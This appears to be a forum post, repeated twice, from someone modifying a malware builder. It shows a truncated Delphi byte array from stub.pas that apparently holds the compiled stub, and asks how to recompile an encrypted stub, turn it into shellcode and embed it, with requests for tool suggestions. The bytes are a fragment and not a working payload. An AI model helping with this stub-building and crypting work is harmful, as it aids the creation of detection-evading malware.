11 Years of Service
96%
i have stub.dpr file after eddit it with new encryption
i see the builder didnt even use it
instead builder use stub.pas file
inside it some codes like this
Const
aSize = 25384;
stub_: Array [0..25383] of Byte =
(
$89,$03,$5D,$5F,$5E,$5B,$C3,$90,$53,$56,$57,$55,$83,$C4,$E8,$8B,$F9,$8B,
$F4,$C7,$44,$24,$08,$FF,$FF,$FF,$FF,$33,$C9,$89,$4C,$24,$0C,$89,$44,$24,
$10,$03,$54,$24,$10,$89,$54,$24,$14,$A1,$D4,$55,$40,$00,$89,$06,$EB,$6B,
$8B,$06,$8B,$00,$89,$44,$24,$04,$8B,$06,$8B,$58,$08,$3B,$5C,$24,$10,$72,
$4C,$24,$04,$81,$39,$CE,$FA,$EF,$0E,$74,$37,$E8,$DA,$FE,$FF,$FF,$80,$3D,
$14,$40,$40,$00,$00,$76,$29,$80,$3D,$10,$40,$40,$00,$00,$77,$20,$8D,$4C,
$24,$04,$50,$51,$E8,$81,$E3,$FF,$FF,$83,$F8,$00,$58,$0F,$84,$AB,$00,$00,
$00,$89,$C2,$8B,$44,$24,$04,$8B,$48,$0C,$EB,$30,$89,$C2,$8B,$44,$24,$04,
$8B,$48,$0C,$80,$3D,$14,$40,$40,$00,$01,$76,$1E,$80,$3D,$10,$40,$40,$00,
$00,$77,$15,$50,$8D,$44,$24,$08,$52,$51,$50,$E8,$44,$E3,$FF,$FF,$83,$F8,
$00,$59,$5A,$58,$74,$70,$83,$48,$04,$02,$53,$31,$DB,$56,$57,$55,$64,$8B,
$1B,$53,$50,$52,$51,$8B,$54,$24,$28,$6A,$00,$50,$68,$00,$2D,$40,$00,$52,
$FF,$15,$14,$50,$40,$00,$8B,$7C,$24,$28,$E8,$A7,$0B,$00,$00,$FF,$B0,$00,
$00,$00,$00,$89,$A0,$00,$00,$00,$00,$8B,$6F,$08,$8B,$5F,$04,$C7,$47,$04,
$2C,$2D,$40,$00,$83,$C3,$05,$E8,$66,$FE,$FF,$FF,$FF,$E3,$E9,$23,$00,$00,
$00,$E8,$7A,$0B,$00,$00,$8B,$88,$00,$00,$00,$00,$8B,$11,$89,$90,$00,$00,
);
that mean we compile stub.dpr the convert it to shellcode then add this part to stub pass?
any help needed please and suggest tools for shell stuff or whatever u see
i see the builder didnt even use it
instead builder use stub.pas file
inside it some codes like this
Const
aSize = 25384;
stub_: Array [0..25383] of Byte =
(
$89,$03,$5D,$5F,$5E,$5B,$C3,$90,$53,$56,$57,$55,$83,$C4,$E8,$8B,$F9,$8B,
$F4,$C7,$44,$24,$08,$FF,$FF,$FF,$FF,$33,$C9,$89,$4C,$24,$0C,$89,$44,$24,
$10,$03,$54,$24,$10,$89,$54,$24,$14,$A1,$D4,$55,$40,$00,$89,$06,$EB,$6B,
$8B,$06,$8B,$00,$89,$44,$24,$04,$8B,$06,$8B,$58,$08,$3B,$5C,$24,$10,$72,
$4C,$24,$04,$81,$39,$CE,$FA,$EF,$0E,$74,$37,$E8,$DA,$FE,$FF,$FF,$80,$3D,
$14,$40,$40,$00,$00,$76,$29,$80,$3D,$10,$40,$40,$00,$00,$77,$20,$8D,$4C,
$24,$04,$50,$51,$E8,$81,$E3,$FF,$FF,$83,$F8,$00,$58,$0F,$84,$AB,$00,$00,
$00,$89,$C2,$8B,$44,$24,$04,$8B,$48,$0C,$EB,$30,$89,$C2,$8B,$44,$24,$04,
$8B,$48,$0C,$80,$3D,$14,$40,$40,$00,$01,$76,$1E,$80,$3D,$10,$40,$40,$00,
$00,$77,$15,$50,$8D,$44,$24,$08,$52,$51,$50,$E8,$44,$E3,$FF,$FF,$83,$F8,
$00,$59,$5A,$58,$74,$70,$83,$48,$04,$02,$53,$31,$DB,$56,$57,$55,$64,$8B,
$1B,$53,$50,$52,$51,$8B,$54,$24,$28,$6A,$00,$50,$68,$00,$2D,$40,$00,$52,
$FF,$15,$14,$50,$40,$00,$8B,$7C,$24,$28,$E8,$A7,$0B,$00,$00,$FF,$B0,$00,
$00,$00,$00,$89,$A0,$00,$00,$00,$00,$8B,$6F,$08,$8B,$5F,$04,$C7,$47,$04,
$2C,$2D,$40,$00,$83,$C3,$05,$E8,$66,$FE,$FF,$FF,$FF,$E3,$E9,$23,$00,$00,
$00,$E8,$7A,$0B,$00,$00,$8B,$88,$00,$00,$00,$00,$8B,$11,$89,$90,$00,$00,
);
that mean we compile stub.dpr the convert it to shellcode then add this part to stub pass?
any help needed please and suggest tools for shell stuff or whatever u see